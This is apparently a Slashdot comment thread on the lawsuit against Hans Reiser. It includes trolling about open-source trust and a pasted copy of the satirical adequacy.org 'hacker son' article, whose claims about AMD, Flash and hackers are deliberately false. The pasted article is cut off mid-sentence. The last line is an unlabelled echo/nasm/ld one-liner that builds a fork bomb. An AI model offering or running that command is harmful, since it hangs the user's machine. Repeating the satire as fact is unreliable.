Hans Reiser Sued By Own Kids For $15 Million
New submitter haruchai writes "The Reiser kids, now aged 12 and 11, have had a lawsuit filed against the former Linux developer, inventor of ReiserFS and convicted murderer of the mother of his children, to the tune of $15 million. It's believed he may have hidden assets and a judgment is sought so a search for these can be conducted."
A judge denied requests that the kids testify or return to the U.S. for their own well-being.
Pathetic. If opponents of FOSS stoop this low, FOSS must have already won.
Most ACs are not even worth the keystrokes to insult them. Be generically insulted by this and ignored otherwise.
How is it pathetic? It's just opinion about the mental state of FOSS developers, as illustrated by recent real world case of highly trusted person. It's akin to a CTO choosing Microsoft products instead of random open source products. Sure, there are bad people inside companies too, but the code is more looked at and there are real life recursions.
Open source is just released to the wild and can do anything. You can of course modify it, but who even checks the code they run? They just trust it.
Open source versus closed source is not an indication of a trust in a persons professional capacity or ethics. To try to say that this man's mental state is any way indicative of all mental states of open source developers is just offensive and stupid.
Yeah, but Open Source is all based on the idea of the Cathedral (bad) and the Bizarre(good). I don't know about you, but as a good Christian mom I rather like cathedrals and I filter out the bizarre using AOL Family Filter Pro.
This preference for "the bizarre" shows the twisted mentality of these software Communists. Read this article here and enlighten yourself
http://www.adequacy.org/stories/2001.12.2.42056.2147.html
1. Has your son asked you to change ISPs?
Most American families use trusted and responsible Internet Service Providers, such as AOL. These providers have a strict "No Hacking" policy, and take careful measures to ensure that your internet experience is enjoyable, educational and above all legal. If your child is becoming a hacker, one of his first steps will be to request a change to a more hacker friendly provider.
I would advise all parents to refuse this request. One of the reasons your son is interested in switching providers is to get away from AOL's child safety filter. This filter is vital to any parent who wants his son to enjoy the internet without the endangering him through exposure to "adult" content. It is best to stick with the protection AOL provides, rather than using a home-based solution. If your son is becoming a hacker, he will be able to circumvent any home-based measures with surprising ease, using information gleaned from various hacker sites.
2. Are you finding programs on your computer that you don't remember installing?
Your son will probably try to install some hacker software. He may attempt to conceal the presence of the software in some way, but you can usually find any new programs by reading through the programs listed under "Install/Remove Programs" in your control panel. Popular hacker software includes "Comet Cursor", "Bonzi Buddy" and "Flash".
The best option is to confront your son with the evidence, and force him to remove the offending programs. He will probably try to install the software again, but you will be able to tell that this is happening, if your machine offers to "download" one of the hacker applications. If this happens, it is time to give your son a stern talking to, and possibly consider punishing him with a grounding.
3. Has your child asked for new hardware?
Computer hackers are often limited by conventional computer hardware. They may request "faster" video cards, and larger hard drives, or even more memory. If your son starts requesting these devices, it is possible that he has a legitimate need. You can best ensure that you are buying legal, trustworthy hardware by only buying replacement parts from your computer's manufacturer.
If your son has requested a new "processor" from a company called "AMD", this is genuine cause for alarm. AMD is a third-world based company who make inferior, "knock-off" copies of American processor chips. They use child labor extensively in their third world sweatshops, and they deliberately disable the security features that American processor makers, such as Intel, use to prevent hacking. AMD chips are never sold in stores, and you will most likely be told that you have to order them from internet sites. Do not buy this chip! This is one request that you must refuse your son, if you are to have any hope of raising him well.
4. Does your child read hacking manuals?
If you pay close attention to your son's reading habits, as I do, you will be able to determine a great deal about his opinions and hobbies. Children are at their most impressionable in the teenage years. Any father who has had a seventeen year old daughter attempt to sneak out on a date wearing make up
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;